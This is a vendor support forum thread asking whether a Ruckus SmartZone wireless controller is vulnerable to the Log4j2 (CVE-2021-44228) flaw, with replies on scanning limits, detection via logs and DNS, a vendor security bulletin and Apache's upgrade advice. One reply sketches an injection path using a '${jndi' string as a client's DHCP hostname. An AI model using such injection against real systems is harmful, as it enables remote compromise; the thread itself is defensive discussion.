12-12-2021 05:51 PM
Hello.
Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.
The customer asked if the SmartZone has the following this security vulnerabilities.
** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE
Thank you for your valuable answers to the above questions.
12-15-2021 04:19 AM
No information on that part so far. I would update here as soon as I hear one.
Best Regards
Vineet
12-15-2021 06:02 AM
Hi Bjarne,
we let ran security scan (CERT BSI and so on included - only TCP - takes several hours) over our AP control interfaces (vSZ-H) with 5.2.2.0.1161. It just complained about icmp uptime spoofable, weak ssh key support from DSA and SH1 support (I think has to do with Centos 7 below it and maybe support of older APs). No log4j complain from it - but Ruckus needs to confirm.
12-15-2021 07:48 AM
no cert scan / port scan will find this vulnerability. You need to be monitoring both the log files as well as an upstream DNS server to see if the system is issuing queries. I doubt any of the scanning tools claim to find this and/or have been updated so quickly as to add the attack. It would require you to poing smartzone to a particular dns server and the attack would be via API fields which most tools do not scan in depth. Personal testing (and others here on this thread) have shown the system to be vulnerable, at the very least, to information disclosure attacks through jndi / log4j.
It's different for a WAF (web application firewall) that can look at the API calls being made to smartzone. The problem here is that smartzone potentially has multiple attack vectors outside of the API channel, where data sent FROM the AP could trigger this. For example, a maliciously named client uses the ${jndi string as its dhcp hostname. I have not verified this path of exploitation, but so many user-related data is sent to the controller and logged that the risk is extremely high.
12-15-2021 08:43 PM
The v1.2 update to the Security Bulletin is now live in the Support Portal at https://support.ruckuswireless.com/security_bulletins/313 and the files will be mirrored on the www page in the morning: https://www.commscope.com/security-bulletins/
Allan.
12-15-2021 11:13 PM
@allan_grohe Thanks for the update. But it is really unclear how we get this update. Will this be a general download or needs this to be request from customer support?
And will the fix include the lastest recommendation from Apache LOG4J?
Because it seems that the first mentioned mitigation strategies are not sufficient. See recent announcement:
https://logging.apache.org/log4j/2.x/security.html#History
Cite: "This page previously mentioned other mitigation measures, but we discovered that these measures only limit exposure while leaving some attack vectors open.
...
The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar."
Safe version would be the latest 2.16